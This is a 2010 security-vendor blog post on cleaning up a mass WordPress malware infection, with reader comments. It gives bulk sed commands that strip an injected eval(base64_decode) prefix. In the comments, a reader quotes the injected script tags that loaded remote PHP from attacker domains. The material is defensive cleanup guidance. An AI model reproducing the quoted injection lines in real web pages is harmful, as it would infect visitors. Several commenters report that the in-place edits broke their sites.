Simple cleanup solution for the latest WordPress hack

May 7, 2010 by 155 Comments

If your site got hacked on the last mass infection of WordPress sites out there, we have a simple solution to clean it up.

For Network Solutions users:

If your site is at Network Solutions, and you have that “virtual-ad.org” malware, the solution is simple.

Login via FTP and remove the file cgi-bin/php.ini. That’s all you need to do to protect your users.

You will still have some “.nts” files in there (which you can remove later), but they will not be executed without the php.ini.

Via SSH:

If you have SSH access to your server, run the following commands on your web root:


$ find ./ -name "*.php" -type f |  xargs sed -i 's#<?php /\*\*/ eval(base64_decode("aWY.*?>##g' 2>&1

$ find ./ -name "*.php" -type f |  xargs sed -i '/./,$!d' 2>&1

Via web:

If you don’t have SSH access, download this file to your desktop:
http://sucuri.net/malware/helpers/wordpress-fix_php.txt and rename it to wordpress-fix.php.

After that, upload it to your site via FTP, and run it (using your browser) as: http://yoursite.com/wordpress-fix.php

This script will take a few minutes to complete, but will scan your whole site and remove the malware entries.

Once you are done, go back to your site and remove this file.

That’s it and you should be clean again.

UPDATE: If your site is not getting cleanup after you run it (or you are getting extra empty lines on the top of your files), it means that the script didn’t finish to run properly. Try running it again. It it doesn’t help, upload it to some sub directories (like wp-admin, wp-content and wp-includes) and run directly from there. For example:
http://yoursite.com/wp-admin/wordpress-fix.php , http://yoursite.com/wp-content/wordpress-fix.php , etc.
That should fix it!

As always, if you are having difficulties getting your site cleanup, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Filed Under: Uncategorized Tagged With: , , ,
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.

Older Comments
  • Anonymous

    Hello Guys,

    I am also a victim.My suggestion is that if you are using any plugins like javascript and CSS optimizer then remove it. It's and RFI attack.Hope you all be happy with this.The attacker first distribute free program (open source) which working fine but he puts a security hole init for later use.He win the faith from us and then attack.

  • http://amyopoly.com Amy

    Thank you so much!

  • Pingback: Tweets that mention Simple cleanup solution for the latest Wordpress hack | Sucuri Security -- Topsy.com

  • Pingback: WordPress-based, GoDaddy-hosted websites hacked

  • http://blog.p2pfoundation.net james

    If you are on Media Temple, i had 5 blogs, found wordpress templates infected. I suspect my laptop was the fist victim via malware, although not sure. Cleaned that up. Then used script from here. Cleaned it each time, but every day i would see somehow the hackers had reuploaded new exploit-laden akismet plugins onto the server. My latest discovery was that in the folder etc if you login in using ftp, they infected my php.ini file. You need to remove the last line on that file and then delete the sample.php.ini file which hosted malware. Now all clean again, but waiting for a few days to see if they come back (wish me luck!)

  • Bruce

    Thank you so much for the Quick Fix! So far everything looks good but will keep an eye on it.

  • Pingback: Attack on Wordpress – "http://www.indesignstudioinfo.com/ls.php" – Themes 'n' Templates Base

  • http://blog.digitaltavern.com MacMyDay

    i run this script and i find that i get an error:

    -bash: : command not found
    running this:
    $ find ./ -name "*.php" -type f | xargs sed -i 's###g' 2>&1
    My recent post iOS4 iPhone 4 Release Day Apple Store

  • Evan

    My WP was hacked on bluehost (3 sites). I ran the script but still see suspecious Java script in my footer when view the page source in the browser. You can see at internetincomeformula.com I have viewed the theme editor in the admin looking for this code in the footer. It is nowhere to be found. But when I view the page source code in my browser I can see this java script. How do I remove it?

  • eckert

    i ran this on 5 WP sites, only to then find them all white-screened. i was able to find the malicious code on a couple of them, but it's not showing up on one in particular. if anyone has any suggestions, they would be much appreciated.

  • Pingback: Yet another series of attacks – This time using whereisdudescars.com | Sucuri

  • sang truong

    Seems like everyone has got it to work but i am having so much problem. I keep getting a 404 or
    Warning: Unexpected character in input: ” (ASCII=92) state=1

    Parse error: syntax error, unexpected T_STRING

    Appreciate any help

  • mauma

    good, but if you have installed nextgenGallery remove the plug-in code that is used instead.
    make sure that your plug-ins do not use encode_64 before making this operation

  • http://www.easyrent.mk.ua George

    All my PHP files were infected by:

    All my HTML files were infected by:
    <script src =http:// rubydistributions. com/imgs/cardgood .php >
    All my “js” files were infected by:
    document.write(‘<script src =http:// rustytolin. com/images/gifimg. php >’);

    document.write(‘<script src = http:// rubydistributions. com /imgs/cardgood . php >’);

    It was only the one attack and so many kind of files were infected.

  • http://www.easyrent.mk.ua George

    Also malware create infected files "robots.php" and gifimg.php in "images" category of website

  • Rick

    Please help me perform this step:
    If you don’t have SSH access, download this file to your desktop: http://sucuri.net/malware/helpers/wordpress-fix_p… and rename it to wordpress-fix.php.

    How do you download a 'text' file to your desktop? Thanks.

  • Rick

    Please help me perform this step:
    If you don’t have SSH access, download this file to your desktop: http://sucuri.net/malware/helpers/wordpress-fix_p…. and rename it to wordpress-fix.php.

    How do you download a 'text' file to your desktop? Thanks.

    • Guest

      right click and save as, or just open it in the browser and copy the contents into a fresh php file

  • Michelle

    I used it on my main domain and then some sub directories and got two different results. I'm assuming one means it ran and was ok, then the other means it found something and cleaned it up. Is that right? I'm pasting them below.

    1. Site remediated by Sucuri
    This script will clean the malware from this attack: http://sucuri.net/malware/entry/MW:MROBH:1

    If you need help, contact support@sucuri.net or visit us at Sucuri.net

    Site remediated by Sucuri
    This script will clean the malware from this attack: http://sucuri.net/malware/entry/MW:MROBH:1

    If you need help, contact support@sucuri.net or visit us at Sucuri.net

    2. Site remediated by Sucuri
    This script will clean the malware from this attack: http://sucuri.net/malware/entry/MW:MROBH:1

    If you need help, contact support@sucuri.net or visit us at Sucuri.net

    Malware removed.
    Empty lines removed.

    Completed.
    My recent post Photos- Castle McCulloch

  • Marisa

    This worked for me but I had to run it several times and place it in my wp-admin directory on some of my blogs. Of 11 WP blogs, only the one at the root had to be run repeatedly. Also, I found a file, wtm.php that had nothing but the malicious code. I blew that one away manually.

    Since this is the third time I’ve been infected, my question now is how do I protect my blogs? Is there any way to make wordpress secure? My wp is update, I’ve placed recommended in my htaccess file and placed that file in each of my wp-admin directories. Is there anything else I can do? I really don’t have time to do this every few days and I don’t have the money to hire someone else to do it for me.

    Any ideas on how to secure WP?

  • Anon

    When I run the command from ssh I get:

    -bash: 1$: ambiguous redirect
    -bash: : command not found

  • Pingback: Sites Wordpress estão vulneráveis a ataques de injeção de código | Portal KeepGeek

  • Pingback: How to cope with a WordPress hack - Security tips and advice | Kate Toon

  • john

    thanks a lot it is really working,, its cleaned .. i should have found this before i manually delete and replaced my files..

  • http://www.hipstrumentals.com Hipstrumentals

    Thanks You SOOOO Much!!!

  • tenouk

    Today… got the same problem…I use Drupal … can i still use the wordpress-fix.php to fix my site

  • Pingback: We were hacked. GoDaddy sites with WordPress Targeted | Mark8t: SEO, SEM, E-Marketing And More

  • http://www.musclehack.com/ Mark McManus

    This was incredibly useful! Thank you so much!
    I was just hacked again today, Sep 18th 2010. This cleaned it up in an instant.
    Thanks for a great fix. :)
    Mark McManus
    My recent post 5 Reasons Why Water Aids Fat Loss

  • http://blog.abhayamedia.com Health Magazine

    Thanks a lot. The malware is apparently cleared after running the script.
    My recent post How to Avoid Burnout and Bring Back Childlike Happiness

  • http://www.blogtips.org Peter

    If you don't have SSH access, and need a fast, easy and secure way to detect and cure this malware attack, check this post:

    PS: the people at sucuri.net were the first website to pick up on the latest hack. Well done!

    Once more, the PHP-based community would be grateful if anyone could come up with a way to protect PHP files being patched by hackers.
    My recent post GoDaddy sites hacked again

  • http://webylife.com Nikunj Tamboli

    Thank you so much, I cant say how much your post has helped me, you have saved me a lot of time, thanks a lot
    My recent post 50 Space Wallpapers Collections In High Resolution

  • derekbanas

    Great job guys. I got the script to work. Anyone here that Sucuri helps, should really think about signing up for their services. I did and they deserve the little bit they ask for, for helping all of us!
    My recent post Regular Expressions Python Tutorial

  • http://djdesignerlab.com Dibakar

    the script is superb. it really cleaned the malware from my wordpress blog. Thanks for the coder…
    My recent post 22 Popular iPhone Mobile Website Collection

  • bcpjy04

    Thank you guys, this was a great script that cleared it right up.

  • http://twitter.com/dinotrade Christoph Dittler

    Can I use this Script on Joomla 1.5-Website?
    I’m looking for an Simple-Clean-Script for Joomla 1.5
    I have no php.ini on cgi-bin-path.

  • http://twitter.com/millerandmiller James Miller

    Thank you, saved a lot of time, wish I knew about it 10 hrs ago. – Worked like a charm :)

  • Guest

    my website got hacked, spent a whole day re installing and fixed it. Then I found out about this script and decided to run it incase there was any left over trace of the virus and the script broke the website again :(

    I had to delete all my plugins and re install them before it started working again. USE WITH CAUTION!

  • Andy Wooles

    Thanks guys – the script did a great clean up of my client’s site.

  • Fonni

    I am trying to run the script downloaded from this site, but keep getting a 404 Not found page when I type in the address from where the file is located on my ftp.
    Can anyone please help? Much appreciated.

    • Info

      Getting the same thing, did you manage to find a solution?

  • http://all-noise.co.uk Lukeglassford

    sweet. this worked perfectly, thanks muchly!

  • http://twitter.com/MorganSigns Morgan Signs

    Thanks guys – great job – worked like a dream and saved me a huge headache.
    cheers

  • Oscarcab_100

    Hi, I wonder if the virus attacks have also occurred in wordpress blogs and if there is a way to avoid them. Thanks

  • Pingback: WordPress Security: My Blog Was Hacked | Passive Income Strategies

  • Kevin Lycett

    Thank you so much, client’s site hacked 3 times by this nasty little devil, hopefully your solution is the end of it. R.E.S.P.E.C.T. to Sucuri.

  • Pingback: Trunk Media Blog » Blog Archive » Dairy of a wordpress virus attack

  • Pingback: The Wordpress Hack! «

  • Pingback: World Gone Web hacked : World Gone Web

  • Pingback: Blue Host Deactivating Accounts For Malware/Virus Violations

  • Pingback: WordPress Security – Protect Your Blog from Being Hacked

  • Pingback: Fixing Wordpress after a Malware Attack | The Boy Who Cried Fox

  • Pingback: Live to Try » I got pwned, did you?

  • Pingback: How to cope with a WordPress hack - Security tips and advice | Kate Toon Copywriter

  • Pingback: Note to Self: Cleaning up Hacks — perpetual beta | release

Older Comments